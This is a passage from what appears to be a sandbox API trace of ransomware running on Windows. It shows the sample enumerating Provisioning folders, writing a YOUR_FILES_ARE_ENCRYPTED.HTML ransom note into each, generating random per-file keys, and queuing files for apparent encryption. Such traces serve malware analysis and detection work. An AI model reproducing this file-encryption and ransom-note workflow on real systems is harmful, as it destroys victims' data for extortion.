lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" [0106.905] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*" [0106.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.905] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.905] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa198dbb0, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa198dbb0, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19b3e1c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xfcb, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.905] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.905] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.905] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.905] lstrlenW (lpString=".provxml") returned 8 [0106.906] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.906] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19da08f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0106.906] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.906] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0106.906] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.906] lstrlenW (lpString=".provxml") returned 8 [0106.906] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.906] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0106.906] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.906] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml") returned 109 [0106.906] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0106.906] lstrlenW (lpString=".provxml") returned 8 [0106.906] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0106.906] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0 [0106.906] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.906] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.906] GetProcessHeap () returned 0x600000 [0106.906] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.906] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.909] WriteFile (in: hFile=0x32c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.910] CloseHandle (hObject=0x32c) returned 1 [0106.910] GetProcessHeap () returned 0x600000 [0106.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.910] GetProcessHeap () returned 0x600000 [0106.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.911] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19b3e1c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19b3e1c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.911] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.911] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml") returned 97 [0106.911] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.911] lstrlenW (lpString=".xml") returned 4 [0106.911] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.911] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.911] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.912] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=555) returned 1 [0106.912] GetProcessHeap () returned 0x600000 [0106.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.914] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="6A") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="A9") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="D8") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="60") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="25") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="84") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="E7") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="EE") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="92") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="36") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="56") returned 2 [0106.914] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="F3") returned 2 [0106.914] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="FF") returned 2 [0106.914] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="25") returned 2 [0106.914] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="31") returned 2 [0106.914] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="1F") returned 2 [0106.914] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="E9") returned 2 [0106.914] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="17") returned 2 [0106.914] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="17") returned 2 [0106.914] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="49") returned 2 [0106.914] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="B0") returned 2 [0106.914] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="38") returned 2 [0106.914] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="54") returned 2 [0106.914] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="A8") returned 2 [0106.914] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="A7") returned 2 [0106.915] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="6C") returned 2 [0106.915] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="81") returned 2 [0106.915] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="0D") returned 2 [0106.915] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="EE") returned 2 [0106.915] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="EA") returned 2 [0106.915] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="DF") returned 2 [0106.915] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4C") returned 2 [0106.915] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" [0106.915] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.915] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.915] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19b3e1c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19b3e1c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.915] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0106.916] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.916] GetProcessHeap () returned 0x600000 [0106.916] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.916] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.916] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.917] CloseHandle (hObject=0x314) returned 1 [0106.918] GetProcessHeap () returned 0x600000 [0106.918] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.918] GetProcessHeap () returned 0x600000 [0106.918] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.918] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.919] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.919] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.919] GetProcessHeap () returned 0x600000 [0106.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0106.919] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.921] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.924] CloseHandle (hObject=0x308) returned 1 [0106.927] GetProcessHeap () returned 0x600000 [0106.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0106.927] GetProcessHeap () returned 0x600000 [0106.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.928] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", cAlternateFileName="{8FB7D~1")) returned 1 [0106.928] StrStrIW (lpFirst="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.928] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned 80 [0106.928] GetProcessHeap () returned 0x600000 [0106.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.929] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" [0106.929] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*" [0106.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0106.931] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.931] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1692b03, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x36b, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.931] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.931] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned 99 [0106.931] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.931] lstrlenW (lpString=".xml") returned 4 [0106.931] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.931] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.931] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=875) returned 1 [0106.931] GetProcessHeap () returned 0x600000 [0106.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.934] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="24") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="57") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="3D") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="E9") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="81") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C0") returned 2 [0106.934] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="71") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="7B") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="81") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2B") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="75") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A2") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="CE") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="B2") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="42") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="50") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="47") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="4C") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="6F") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="05") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="9B") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D9") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="38") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="19") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="3E") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="D1") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="57") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="54") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="44") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="3D") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="1B") returned 2 [0106.934] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="21") returned 2 [0106.935] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" [0106.935] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.935] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.935] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, 